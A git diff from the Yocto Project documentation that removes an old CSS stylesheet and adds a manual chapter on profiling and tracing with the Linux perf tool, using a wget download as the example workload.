-  border-bottom-color: #fff;
-}
-
-
-.warning {
-  background-color: #f0f0f2;
-}
-
-.caution {
-  background-color: #f0f0f2;
-}
-
-.tip {
-  background-color: #f0f0f2;
-}
-
-.note {
-  background-color: #f0f0f2;
-}
-
-.glossary dl dt,
-.variablelist dl dt,
-.variablelist dl dt span.term {
-  color: #044;
-}
-
-div.figure,
-div.table,
-div.example,
-div.informalfigure,
-div.informaltable,
-div.informalexample {
-  border-color: #aaa;
-}
-
-pre.programlisting {
-  color: black;
-  background-color: #fff;
-  border-color: #aaa;
-  border-width: 2px;
-}
-
-.guimenu,
-.guilabel,
-.guimenuitem {
-  background-color: #eee;
-}
-
-
-b.keycap,
-.keycap {
-  background-color: #eee;
-  border-color: #999;
-}
-
-
-div.navheader {
-  border-color: black;
-}
-
-
-div.navfooter {
-  border-color: black;
-}
-
-
-  /*********** /
- /  graphics  /
-/ ***********/
-
-/*
-body {
-  background-image: url("images/body_bg.jpg");
-  background-attachment: fixed;
-}
-
-.navheader,
-.note,
-.tip {
-  background-image: url("images/note_bg.jpg");
-  background-attachment: fixed;
-}
-
-.warning,
-.caution {
-  background-image: url("images/warning_bg.jpg");
-  background-attachment: fixed;
-}
-
-.figure,
-.informalfigure,
-.example,
-.informalexample,
-.table,
-.informaltable {
-  background-image: url("images/figure_bg.jpg");
-  background-attachment: fixed;
-}
-
-*/
-h1,
-h2,
-h3,
-h4,
-h5,
-h6,
-h7{
-}
-
-/*
-Example of how to stick an image as part of the title.
-
-div.article .titlepage .title
-{
-  background-image: url("figures/white-on-black.png");
-  background-position: center;
-  background-repeat: repeat-x;
-}
-*/
-
-div.preface .titlepage .title,
-div.colophon .title,
-div.chapter .titlepage .title,
-div.article .titlepage .title
-{
-}
-
-div.section div.section .titlepage .title,
-div.sect2 .titlepage .title {
-    background: none;
-}
-
-
-h1.title {
-  background-color: transparent;
-  background-repeat: no-repeat;
-  height: 256px;
-  text-indent: -9000px;
-  overflow:hidden;
-}
-
-h2.subtitle {
-  background-color: transparent;
-  text-indent: -9000px;
-  overflow:hidden;
-  width: 0px;
-  display: none;
-}
-
-  /*************************************** /
- /  pippin.gimp.org specific alterations  /
-/ ***************************************/
-
-/*
-div.heading, div.navheader {
-  color: #777;
-  font-size: 80%;
-  padding: 0;
-  margin: 0;
-  text-align: left;
-  position: absolute;
-  top: 0px;
-  left: 0px;
-  width: 100%;
-  height: 50px;
-  background: url('/gfx/heading_bg.png') transparent;
-  background-repeat: repeat-x;
-  background-attachment: fixed;
-  border: none;
-}
-
-div.heading a {
-  color: #444;
-}
-
-div.footing, div.navfooter {
-  border: none;
-  color: #ddd;
-  font-size: 80%;
-  text-align:right;
-
-  width: 100%;
-  padding-top: 10px;
-  position: absolute;
-  bottom: 0px;
-  left: 0px;
-
-  background: url('/gfx/footing_bg.png') transparent;
-}
-*/
-
-
-
-  /****************** /
- /  nasty ie tweaks  /
-/ ******************/
-
-/*
-div.heading, div.navheader {
-  width:expression(document.body.clientWidth + "px");
-}
-
-div.footing, div.navfooter {
-  width:expression(document.body.clientWidth + "px");
-  margin-left:expression("-5em");
-}
-body {
-  padding:expression("4em 5em 0em 5em");
-}
-*/
-
-  /**************************************** /
- / mozilla vendor specific css extensions  /
-/ ****************************************/
-/*
-div.navfooter, div.footing{
-  -moz-opacity: 0.8em;
-}
-
-div.figure,
-div.table,
-div.informalfigure,
-div.informaltable,
-div.informalexample,
-div.example,
-.tip,
-.warning,
-.caution,
-.note {
-  -moz-border-radius: 0.5em;
-}
-
-b.keycap,
-.keycap {
-  -moz-border-radius: 0.3em;
-}
-*/
-
-table tr td table tr td {
-  display: none;
-}
-
-
-hr {
-  display: none;
-}
-
-table {
-  border: 0em;
-}
-
- .photo {
-  float: right;
-  margin-left:   1.5em;
-  margin-bottom: 1.5em;
-  margin-top: 0em;
-  max-width:      17em;
-  border:     1px solid gray;
-  padding:    3px;
-  background: white;
-}
- .seperator {
-   padding-top: 2em;
-   clear: both;
-  }
-
-  #validators {
-      margin-top: 5em;
-      text-align: right;
-      color: #777;
-  }
-  @media print {
-      body {
-          font-size: 8pt;
-      }
-      .noprint {
-          display: none;
-      }
-  }
-
-
-.tip,
-.note {
-   background: #f0f0f2;
-   color: #333;
-   padding: 20px;
-   margin: 20px;
-}
-
-.tip h3,
-.note h3 {
-   padding: 0em;
-   margin: 0em;
-   font-size: 2em;
-   font-weight: bold;
-   color: #333;
-}
-
-.tip a,
-.note a {
-   color: #333;
-   text-decoration: underline;
-}
-
-.footnote {
-   font-size: small;
-   color: #333;
-}
-
-/* Changes the announcement text */
-.tip h3,
-.warning h3,
-.caution h3,
-.note h3 {
-   font-size:large;
-   color: #00557D;
-}
diff --git a/documentation/profile-manual/profile-manual-usage.rst b/documentation/profile-manual/profile-manual-usage.rst
new file mode 100644
index 0000000000..e389a13fc0
--- /dev/null
+++ b/documentation/profile-manual/profile-manual-usage.rst
@@ -0,0 +1,2623 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+.. highlight:: shell
+
+***************************************************************
+Basic Usage (with examples) for each of the Yocto Tracing Tools
+***************************************************************
+
+|
+
+This chapter presents basic usage examples for each of the tracing
+tools.
+
+.. _profile-manual-perf:
+
+perf
+====
+
+The 'perf' tool is the profiling and tracing tool that comes bundled
+with the Linux kernel.
+
+Don't let the fact that it's part of the kernel fool you into thinking
+that it's only for tracing and profiling the kernel - you can indeed use
+it to trace and profile just the kernel, but you can also use it to
+profile specific applications separately (with or without kernel
+context), and you can also use it to trace and profile the kernel and
+all applications on the system simultaneously to gain a system-wide view
+of what's going on.
+
+In many ways, perf aims to be a superset of all the tracing and
+profiling tools available in Linux today, including all the other tools
+covered in this HOWTO. The past couple of years have seen perf subsume a
+lot of the functionality of those other tools and, at the same time,
+those other tools have removed large portions of their previous
+functionality and replaced it with calls to the equivalent functionality
+now implemented by the perf subsystem. Extrapolation suggests that at
+some point those other tools will simply become completely redundant and
+go away; until then, we'll cover those other tools in these pages and in
+many cases show how the same things can be accomplished in perf and the
+other tools when it seems useful to do so.
+
+The coverage below details some of the most common ways you'll likely
+want to apply the tool; full documentation can be found either within
+the tool itself or in the man pages at
+`perf(1) <http://linux.die.net/man/1/perf>`__.
+
+.. _perf-setup:
+
+Perf Setup
+----------
+
+For this section, we'll assume you've already performed the basic setup
+outlined in the ":ref:`profile-manual/profile-manual-intro:General Setup`" section.
+
+In particular, you'll get the most mileage out of perf if you profile an
+image built with the following in your ``local.conf`` file: ::
+
+   INHIBIT_PACKAGE_STRIP = "1"
+
+perf runs on the target system for the most part. You can archive
+profile data and copy it to the host for analysis, but for the rest of
+this document we assume you've ssh'ed to the host and will be running
+the perf commands on the target.
+
+.. _perf-basic-usage:
+
+Basic Perf Usage
+----------------
+
+The perf tool is pretty much self-documenting. To remind yourself of the
+available commands, simply type 'perf', which will show you basic usage
+along with the available perf subcommands: ::
+
+   root@crownbay:~# perf
+
+   usage: perf [--version] [--help] COMMAND [ARGS]
+
+   The most commonly used perf commands are:
+     annotate        Read perf.data (created by perf record) and display annotated code
+     archive         Create archive with object files with build-ids found in perf.data file
+     bench           General framework for benchmark suites
+     buildid-cache   Manage build-id cache.
+     buildid-list    List the buildids in a perf.data file
+     diff            Read two perf.data files and display the differential profile
+     evlist          List the event names in a perf.data file
+     inject          Filter to augment the events stream with additional information
+     kmem            Tool to trace/measure kernel memory(slab) properties
+     kvm             Tool to trace/measure kvm guest os
+     list            List all symbolic event types
+     lock            Analyze lock events
+     probe           Define new dynamic tracepoints
+     record          Run a command and record its profile into perf.data
+     report          Read perf.data (created by perf record) and display the profile
+     sched           Tool to trace/measure scheduler properties (latencies)
+     script          Read perf.data (created by perf record) and display trace output
+     stat            Run a command and gather performance counter statistics
+     test            Runs sanity tests.
+     timechart       Tool to visualize total system behavior during a workload
+     top             System profiling tool.
+
+   See 'perf help COMMAND' for more information on a specific command.
+
+
+Using perf to do Basic Profiling
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+As a simple test case, we'll profile the 'wget' of a fairly large file,
+which is a minimally interesting case because it has both file and
+network I/O aspects, and at least in the case of standard Yocto images,
+it's implemented as part of busybox, so the methods we use to analyze it
+can be used in a very similar way to the whole host of supported busybox
+applets in Yocto. ::
+
+   root@crownbay:~# rm linux-2.6.19.2.tar.bz2; \
+                    wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+The quickest and easiest way to get some basic overall data about what's
+going on for a particular workload is to profile it using 'perf stat'.
+'perf stat' basically profiles using a few default counters and displays
+the summed counts at the end of the run: ::
+
+   root@crownbay:~# perf stat wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% |***************************************************| 41727k  0:00:00 ETA
+
+   Performance counter stats for 'wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2':
+
+         4597.223902 task-clock                #    0.077 CPUs utilized
+               23568 context-switches          #    0.005 M/sec
+                  68 CPU-migrations            #    0.015 K/sec
+                 241 page-faults               #    0.052 K/sec
+          3045817293 cycles                    #    0.663 GHz
+     <not supported> stalled-cycles-frontend
+     <not supported> stalled-cycles-backend
+           858909167 instructions              #    0.28  insns per cycle
+           165441165 branches                  #   35.987 M/sec
+            19550329 branch-misses             #   11.82% of all branches
+
+        59.836627620 seconds time elapsed
+
+Many times such a simple-minded test doesn't yield much of
+interest, but sometimes it does (see Real-world Yocto bug (slow
+loop-mounted write speed)).
+
+Also, note that 'perf stat' isn't restricted to a fixed set of counters
+- basically any event listed in the output of 'perf list' can be tallied
+by 'perf stat'. For example, suppose we wanted to see a summary of all
+the events related to kernel memory allocation/freeing along with cache
+hits and misses: ::
+
+   root@crownbay:~# perf stat -e kmem:* -e cache-references -e cache-misses wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% |***************************************************| 41727k  0:00:00 ETA
+
+   Performance counter stats for 'wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2':
+
+                5566 kmem:kmalloc
+              125517 kmem:kmem_cache_alloc
+                   0 kmem:kmalloc_node
+                   0 kmem:kmem_cache_alloc_node
+               34401 kmem:kfree
+               69920 kmem:kmem_cache_free
+                 133 kmem:mm_page_free
+                  41 kmem:mm_page_free_batched
+               11502 kmem:mm_page_alloc
+               11375 kmem:mm_page_alloc_zone_locked
+                   0 kmem:mm_page_pcpu_drain
+                   0 kmem:mm_page_alloc_extfrag
+            66848602 cache-references
+             2917740 cache-misses              #    4.365 % of all cache refs
+
+        44.831023415 seconds time elapsed
+
+So 'perf stat' gives us a nice easy
+way to get a quick overview of what might be happening for a set of
+events, but normally we'd need a little more detail in order to
+understand what's going on in a way that we can act on in a useful way.
+
+To dive down into a next level of detail, we can use 'perf record'/'perf
+report' which will collect profiling data and present it to use using an
+interactive text-based UI (or simply as text if we specify --stdio to
+'perf report').
+
+As our first attempt at profiling this workload, we'll simply run 'perf
+record', handing it the workload we want to profile (everything after
+'perf record' and any perf options we hand it - here none - will be
+executed in a new shell). perf collects samples until the process exits
+and records them in a file named 'perf.data' in the current working
+directory. ::
+
+   root@crownbay:~# perf record wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% |************************************************| 41727k  0:00:00 ETA
+   [ perf record: Woken up 1 times to write data ]
+   [ perf record: Captured and wrote 0.176 MB perf.data (~7700 samples) ]
+
+To see the results in a
+'text-based UI' (tui), simply run 'perf report', which will read the
+perf.data file in the current working directory and display the results
+in an interactive UI: ::
+
+   root@crownbay:~# perf report
+
+.. image:: figures/perf-wget-flat-stripped.png
+   :align: center
+
+The above screenshot displays a 'flat' profile, one entry for each
+'bucket' corresponding to the functions that were profiled during the
+profiling run, ordered from the most popular to the least (perf has
+options to sort in various orders and keys as well as display entries
+only above a certain threshold and so on - see the perf documentation
+for details). Note that this includes both userspace functions (entries
+containing a [.]) and kernel functions accounted to the process (entries
+containing a [k]). (perf has command-line modifiers that can be used to
+restrict the profiling to kernel or userspace, among others).
+
+Notice also that the above report shows an entry for 'busybox', which is
+the executable that implements 'wget' in Yocto, but that instead of a
+useful function name in that entry, it displays a not-so-friendly hex
+value instead. The steps below will show how to fix that problem.
+
+Before we do that, however, let's try running a different profile, one
+which shows something a little more interesting. The only difference
+between the new profile and the previous one is that we'll add the -g
+option, which will record not just the address of a sampled function,
+but the entire callchain to the sampled function as well: ::
+
+   root@crownbay:~# perf record -g wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+   Connecting to downloads.yoctoproject.org (140.211.169.59:80)
+   linux-2.6.19.2.tar.b 100% |************************************************| 41727k  0:00:00 ETA
+   [ perf record: Woken up 3 times to write data ]
+   [ perf record: Captured and wrote 0.652 MB perf.data (~28476 samples) ]
+
+
+   root@crownbay:~# perf report
+
+.. image:: figures/perf-wget-g-copy-to-user-expanded-stripped.png
+   :align: center
+
+Using the callgraph view, we can actually see not only which functions
+took the most time, but we can also see a summary of how those functions
+were called and learn something about how the program interacts with the
+kernel in the process.
+
+Notice that each entry in the above screenshot now contains a '+' on the
+left-hand side. This means that we can expand the entry and drill down
+into the callchains that feed into that entry. Pressing 'enter' on any
+one of them will expand the callchain (you can also press 'E' to expand
+them all at the same time or 'C' to collapse them all).
+
+In the screenshot above, we've toggled the ``__copy_to_user_ll()`` entry
+and several subnodes all the way down. This lets us see which callchains
+contributed to the profiled ``__copy_to_user_ll()`` function which
+contributed 1.77% to the total profile.
+
+As a bit of background explanation for these callchains, think about
+what happens at a high level when you run wget to get a file out on the
+network. Basically what happens is that the data comes into the kernel
+via the network connection (socket) and is passed to the userspace
+program 'wget' (which is actually a part of busybox, but that's not
+important for now), which takes the buffers the kernel passes to it and
+writes it to a disk file to save it.
+
+The part of this process that we're looking at in the above call stacks
+is the part where the kernel passes the data it's read from the socket
+down to wget i.e. a copy-to-user.
+
+Notice also that here there's also a case where the hex value is
+displayed in the callstack, here in the expanded ``sys_clock_gettime()``
+function. Later we'll see it resolve to a userspace function call in
+busybox.
+
+.. image:: figures/perf-wget-g-copy-from-user-expanded-stripped.png
+   :align: center
+
+The above screenshot shows the other half of the journey for the data -
+from the wget program's userspace buffers to disk. To get the buffers to
+disk, the wget program issues a ``write(2)``, which does a ``copy-from-user`` to
+the kernel, which then takes care via some circuitous path (probably
+also present somewhere in the profile data), to get it safely to disk.
+
+Now that we've seen the basic layout of the profile data and the basics
+of how to extract useful information out of it, let's get back to the
+task at hand and see if we can get some basic idea about where the time
+is spent in the program we're profiling, wget. Remember that wget is
+actually implemented as an applet in busybox, so while the process name
+is 'wget', the executable we're actually interested in is busybox. So
+let's expand the first entry containing busybox:
+
+.. image:: figures/perf-wget-busybox-expanded-stripped.png
+   :align: center
+
+Again, before we expanded we saw that the function was labeled with a
+hex value instead of a symbol as with most of the kernel entries.
+Expanding the busybox entry doesn't make it any better.
+
+The problem is that perf can't find the symbol information for the
+busybox binary, which is actually stripped out by the Yocto build
+system.
+
+One way around that is to put the following in your ``local.conf`` file
+when you build the image: ::
+
+   INHIBIT_PACKAGE_STRIP = "1"
+
+However, we already have an image with the binaries stripped, so
+what can we do to get perf to resolve the symbols? Basically we need to
+install the debuginfo for the busybox package.
+
+To generate the debug info for the packages in the image, we can add
+``dbg-pkgs`` to :term:`EXTRA_IMAGE_FEATURES` in ``local.conf``. For example: ::
+
+   EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
+
+Additionally, in order to generate the type of debuginfo that perf
+understands, we also need to set
+:term:`PACKAGE_DEBUG_SPLIT_STYLE`
+in the ``local.conf`` file: ::
+
+   PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
+
+Once we've done that, we can install the
+debuginfo for busybox. The debug packages once built can be found in
+``build/tmp/deploy/rpm/*`` on the host system. Find the busybox-dbg-...rpm
+file and copy it to the target. For example: ::
+
+   [trz@empanada core2]$ scp /home/trz/yocto/crownbay-tracing-dbg/build/tmp/deploy/rpm/core2_32/busybox-dbg-1.20.2-r2.core2_32.rpm root@192.168.1.31:
+   busybox-dbg-1.20.2-r2.core2_32.rpm                     100% 1826KB   1.8MB/s   00:01
+
+Now install the debug rpm on the target: ::
+
+   root@crownbay:~# rpm -i busybox-dbg-1.20.2-r2.core2_32.rpm
+
+Now that the debuginfo is installed, we see that the busybox entries now display
+their functions symbolically:
+
+.. image:: figures/perf-wget-busybox-debuginfo.png
+   :align: center
+
+If we expand one of the entries and press 'enter' on a leaf node, we're
+presented with a menu of actions we can take to get more information
+related to that entry:
+
+.. image:: figures/perf-wget-busybox-dso-zoom-menu.png
+   :align: center
+
+One of these actions allows us to show a view that displays a
+busybox-centric view of the profiled functions (in this case we've also
+expanded all the nodes using the 'E' key):
+
+.. image:: figures/perf-wget-busybox-dso-zoom.png
+   :align: center
+
+Finally, we can see that now that the busybox debuginfo is installed,
+the previously unresolved symbol in the ``sys_clock_gettime()`` entry
+mentioned previously is now resolved, and shows that the
+sys_clock_gettime system call that was the source of 6.75% of the
+copy-to-user overhead was initiated by the ``handle_input()`` busybox
+function:
+
+.. image:: figures/perf-wget-g-copy-to-user-expanded-debuginfo.png
+   :align: center
+
+At the lowest level of detail, we can dive down to the assembly level
+and see which instructions caused the most overhead in a function.
+Pressing 'enter' on the 'udhcpc_main' function, we're again presented
+with a menu:
+
+.. image:: figures/perf-wget-busybox-annotate-menu.png
+   :align: center
+
+Selecting 'Annotate udhcpc_main', we get a detailed listing of
+percentages by instruction for the udhcpc_main function. From the
+display, we can see that over 50% of the time spent in this function is
+taken up by a couple tests and the move of a constant (1) to a register:
+
+.. image:: figures/perf-wget-busybox-annotate-udhcpc.png
+   :align: center
+
+As a segue into tracing, let's try another profile using a different
+counter, something other than the default 'cycles'.
+
+The tracing and profiling infrastructure in Linux has become unified in
+a way that allows us to use the same tool with a completely different
+set of counters, not just the standard hardware counters that
+traditional tools have had to restrict themselves to (of course the
+traditional tools can also make use of the expanded possibilities now
+available to them, and in some cases have, as mentioned previously).
+
+We can get a list of the available events that can be used to profile a
+workload via 'perf list': ::
+
+   root@crownbay:~# perf list
+
+   List of pre-defined events (to be used in -e):
+    cpu-cycles OR cycles                               [Hardware event]
+    stalled-cycles-frontend OR idle-cycles-frontend    [Hardware event]
+    stalled-cycles-backend OR idle-cycles-backend      [Hardware event]
+    instructions                                       [Hardware event]
+    cache-references                                   [Hardware event]
+    cache-misses                                       [Hardware event]
+    branch-instructions OR branches                    [Hardware event]
+    branch-misses                                      [Hardware event]
+    bus-cycles                                         [Hardware event]
+    ref-cycles                                         [Hardware event]
+
+    cpu-clock                                          [Software event]
+    task-clock                                         [Software event]
+    page-faults OR faults                              [Software event]
+    minor-faults                                       [Software event]
+    major-faults                                       [Software event]
+    context-switches OR cs                             [Software event]
+    cpu-migrations OR migrations                       [Software event]
+    alignment-faults                                   [Software event]
+    emulation-faults                                   [Software event]
+
+    L1-dcache-loads                                    [Hardware cache event]
+    L1-dcache-load-misses                              [Hardware cache event]
+    L1-dcache-prefetch-misses                          [Hardware cache event]
+    L1-icache-loads                                    [Hardware cache event]
+    L1-icache-load-misses                              [Hardware cache event]
+    .
+    .
+    .
+    rNNN                                               [Raw hardware event descriptor]
+    cpu/t1=v1[,t2=v2,t3 ...]/modifier                  [Raw hardware event descriptor]
+     (see 'perf list --help' on how to encode it)
+
+    mem:<addr>[:access]                                [Hardware breakpoint]
+
+    sunrpc:rpc_call_status                             [Tracepoint event]
+    sunrpc:rpc_bind_status                             [Tracepoint event]
+    sunrpc:rpc_connect_status                          [Tracepoint event]
+    sunrpc:rpc_task_begin                              [Tracepoint event]
+    skb:kfree_skb                                      [Tracepoint event]
+    skb:consume_skb                                    [Tracepoint event]
+    skb:skb_copy_datagram_iovec                        [Tracepoint event]
+    net:net_dev_xmit                                   [Tracepoint event]
+    net:net_dev_queue                                  [Tracepoint event]
+    net:netif_receive_skb                              [Tracepoint event]
+    net:netif_rx                                       [Tracepoint event]
+    napi:napi_poll                                     [Tracepoint event]
+    sock:sock_rcvqueue_full                            [Tracepoint event]
+    sock:sock_exceed_buf_limit                         [Tracepoint event]
+    udp:udp_fail_queue_rcv_skb                         [Tracepoint event]
+    hda:hda_send_cmd                                   [Tracepoint event]
+    hda:hda_get_response                               [Tracepoint event]
+    hda:hda_bus_reset                                  [Tracepoint event]
+    scsi:scsi_dispatch_cmd_start                       [Tracepoint event]
+    scsi:scsi_dispatch_cmd_error                       [Tracepoint event]
+    scsi:scsi_eh_wakeup                                [Tracepoint event]
+    drm:drm_vblank_event                               [Tracepoint event]
+    drm:drm_vblank_event_queued                        [Tracepoint event]
+    drm:drm_vblank_event_delivered                     [Tracepoint event]
+    random:mix_pool_bytes                              [Tracepoint event]
+    random:mix_pool_bytes_nolock                       [Tracepoint event]
+    random:credit_entropy_bits                         [Tracepoint event]
+    gpio:gpio_direction                                [Tracepoint event]
+    gpio:gpio_value                                    [Tracepoint event]
+    block:block_rq_abort                               [Tracepoint event]
+    block:block_rq_requeue                             [Tracepoint event]
+    block:block_rq_issue                               [Tracepoint event]
+    block:block_bio_bounce                             [Tracepoint event]
+    block:block_bio_complete                           [Tracepoint event]
+    block:block_bio_backmerge                          [Tracepoint event]
+    .
+    .
+    writeback:writeback_wake_thread                    [Tracepoint event]
+    writeback:writeback_wake_forker_thread             [Tracepoint event]
+    writeback:writeback_bdi_register                   [Tracepoint event]
+    .
+    .
+    writeback:writeback_single_inode_requeue           [Tracepoint event]
+    writeback:writeback_single_inode                   [Tracepoint event]
+    kmem:kmalloc                                       [Tracepoint event]
+    kmem:kmem_cache_alloc                              [Tracepoint event]
+    kmem:mm_page_alloc                                 [Tracepoint event]
+    kmem:mm_page_alloc_zone_locked                     [Tracepoint event]
+    kmem:mm_page_pcpu_drain                            [Tracepoint event]
+    kmem:mm_page_alloc_extfrag                         [Tracepoint event]
+    vmscan:mm_vmscan_kswapd_sleep                      [Tracepoint event]
+    vmscan:mm_vmscan_kswapd_wake                       [Tracepoint event]
+    vmscan:mm_vmscan_wakeup_kswapd                     [Tracepoint event]
+    vmscan:mm_vmscan_direct_reclaim_begin              [Tracepoint event]
+    .
+    .
+    module:module_get                                  [Tracepoint event]
+    module:module_put                                  [Tracepoint event]
+    module:module_request                              [Tracepoint event]
+    sched:sched_kthread_stop                           [Tracepoint event]
+    sched:sched_wakeup                                 [Tracepoint event]
+    sched:sched_wakeup_new                             [Tracepoint event]
+    sched:sched_process_fork                           [Tracepoint event]
+    sched:sched_process_exec                           [Tracepoint event]
+    sched:sched_stat_runtime                           [Tracepoint event]
+    rcu:rcu_utilization                                [Tracepoint event]
+    workqueue:workqueue_queue_work                     [Tracepoint event]
+    workqueue:workqueue_execute_end                    [Tracepoint event]
+    signal:signal_generate                             [Tracepoint event]
+    signal:signal_deliver                              [Tracepoint event]
+    timer:timer_init                                   [Tracepoint event]
+    timer:timer_start                                  [Tracepoint event]
+    timer:hrtimer_cancel                               [Tracepoint event]
+    timer:itimer_state                                 [Tracepoint event]
+    timer:itimer_expire                                [Tracepoint event]
+    irq:irq_handler_entry                              [Tracepoint event]
+    irq:irq_handler_exit                               [Tracepoint event]
+    irq:softirq_entry                                  [Tracepoint event]
+    irq:softirq_exit                                   [Tracepoint event]
+    irq:softirq_raise                                  [Tracepoint event]
+    printk:console                                     [Tracepoint event]
+    task:task_newtask                                  [Tracepoint event]
+    task:task_rename                                   [Tracepoint event]
+    syscalls:sys_enter_socketcall                      [Tracepoint event]
+    syscalls:sys_exit_socketcall                       [Tracepoint event]
+    .
+    .
+    .
+    syscalls:sys_enter_unshare                         [Tracepoint event]
+    syscalls:sys_exit_unshare                          [Tracepoint event]
+    raw_syscalls:sys_enter                             [Tracepoint event]
+    raw_syscalls:sys_exit                              [Tracepoint event]
+
+.. admonition:: Tying it Together
+
+   These are exactly the same set of events defined by the trace event
+   subsystem and exposed by ftrace/tracecmd/kernelshark as files in
+   /sys/kernel/debug/tracing/events, by SystemTap as
+   kernel.trace("tracepoint_name") and (partially) accessed by LTTng.
+
+Only a subset of these would be of interest to us when looking at this
+workload, so let's choose the most likely subsystems (identified by the
+string before the colon in the Tracepoint events) and do a 'perf stat'
+run using only those wildcarded subsystems: ::
+
+   root@crownbay:~# perf stat -e skb:* -e net:* -e napi:* -e sched:* -e workqueue:* -e irq:* -e syscalls:* wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+   Performance counter stats for 'wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2':
+
+               23323 skb:kfree_skb
+                   0 skb:consume_skb
+               49897 skb:skb_copy_datagram_iovec
+                6217 net:net_dev_xmit
+                6217 net:net_dev_queue
+                7962 net:netif_receive_skb
+                   2 net:netif_rx
+                8340 napi:napi_poll
+                   0 sched:sched_kthread_stop
+                   0 sched:sched_kthread_stop_ret
+                3749 sched:sched_wakeup
+                   0 sched:sched_wakeup_new
+                   0 sched:sched_switch
+                  29 sched:sched_migrate_task
+                   0 sched:sched_process_free
+                   1 sched:sched_process_exit
+                   0 sched:sched_wait_task
+                   0 sched:sched_process_wait
+                   0 sched:sched_process_fork
+                   1 sched:sched_process_exec
+                   0 sched:sched_stat_wait
+       2106519415641 sched:sched_stat_sleep
+                   0 sched:sched_stat_iowait
+           147453613 sched:sched_stat_blocked
+         12903026955 sched:sched_stat_runtime
+                   0 sched:sched_pi_setprio
+                3574 workqueue:workqueue_queue_work
+                3574 workqueue:workqueue_activate_work
+                   0 workqueue:workqueue_execute_start
+                   0 workqueue:workqueue_execute_end
+               16631 irq:irq_handler_entry
+               16631 irq:irq_handler_exit
+               28521 irq:softirq_entry
+               28521 irq:softirq_exit
+               28728 irq:softirq_raise
+                   1 syscalls:sys_enter_sendmmsg
+                   1 syscalls:sys_exit_sendmmsg
+                   0 syscalls:sys_enter_recvmmsg
+                   0 syscalls:sys_exit_recvmmsg
+                  14 syscalls:sys_enter_socketcall
+                  14 syscalls:sys_exit_socketcall
+                     .
+                     .
+                     .
+               16965 syscalls:sys_enter_read
+               16965 syscalls:sys_exit_read
+               12854 syscalls:sys_enter_write
+               12854 syscalls:sys_exit_write
+                     .
+                     .
+                     .
+
+        58.029710972 seconds time elapsed
+
+
+
+Let's pick one of these tracepoints
+and tell perf to do a profile using it as the sampling event: ::
+
+   root@crownbay:~# perf record -g -e sched:sched_wakeup wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+.. image:: figures/sched-wakeup-profile.png
+   :align: center
+
+The screenshot above shows the results of running a profile using
+sched:sched_switch tracepoint, which shows the relative costs of various
+paths to sched_wakeup (note that sched_wakeup is the name of the
+tracepoint - it's actually defined just inside ttwu_do_wakeup(), which
+accounts for the function name actually displayed in the profile:
+
+.. code-block:: c
+
+     /*
+      * Mark the task runnable and perform wakeup-preemption.
+      */
+     static void
+     ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
+     {
+          trace_sched_wakeup(p, true);
+          .
+          .
+          .
+     }
+
+A couple of the more interesting
+callchains are expanded and displayed above, basically some network
+receive paths that presumably end up waking up wget (busybox) when
+network data is ready.
+
+Note that because tracepoints are normally used for tracing, the default
+sampling period for tracepoints is 1 i.e. for tracepoints perf will
+sample on every event occurrence (this can be changed using the -c
+option). This is in contrast to hardware counters such as for example
+the default 'cycles' hardware counter used for normal profiling, where
+sampling periods are much higher (in the thousands) because profiling
+should have as low an overhead as possible and sampling on every cycle
+would be prohibitively expensive.
+
+Using perf to do Basic Tracing
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Profiling is a great tool for solving many problems or for getting a
+high-level view of what's going on with a workload or across the system.
+It is however by definition an approximation, as suggested by the most
+prominent word associated with it, 'sampling'. On the one hand, it
+allows a representative picture of what's going on in the system to be
+cheaply taken, but on the other hand, that cheapness limits its utility
+when that data suggests a need to 'dive down' more deeply to discover
+what's really going on. In such cases, the only way to see what's really
+going on is to be able to look at (or summarize more intelligently) the
+individual steps that go into the higher-level behavior exposed by the
+coarse-grained profiling data.
+
+As a concrete example, we can trace all the events we think might be
+applicable to our workload: ::
+
+   root@crownbay:~# perf record -g -e skb:* -e net:* -e napi:* -e sched:sched_switch -e sched:sched_wakeup -e irq:*
+    -e syscalls:sys_enter_read -e syscalls:sys_exit_read -e syscalls:sys_enter_write -e syscalls:sys_exit_write
+    wget http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2
+
+We can look at the raw trace output using 'perf script' with no
+arguments: ::
+
+   root@crownbay:~# perf script
+
+         perf  1262 [000] 11624.857082: sys_exit_read: 0x0
+         perf  1262 [000] 11624.857193: sched_wakeup: comm=migration/0 pid=6 prio=0 success=1 target_cpu=000
+         wget  1262 [001] 11624.858021: softirq_raise: vec=1 [action=TIMER]
+         wget  1262 [001] 11624.858074: softirq_entry: vec=1 [action=TIMER]
+         wget  1262 [001] 11624.858081: softirq_exit: vec=1 [action=TIMER]
+         wget  1262 [001] 11624.858166: sys_enter_read: fd: 0x0003, buf: 0xbf82c940, count: 0x0200
+         wget  1262 [001] 11624.858177: sys_exit_read: 0x200
+         wget  1262 [001] 11624.858878: kfree_skb: skbaddr=0xeb248d80 protocol=0 location=0xc15a5308
+         wget  1262 [001] 11624.858945: kfree_skb: skbaddr=0xeb248000 protocol=0 location=0xc15a5308
+         wget  1262 [001] 11624.859020: softirq_raise: vec=1 [action=TIMER]
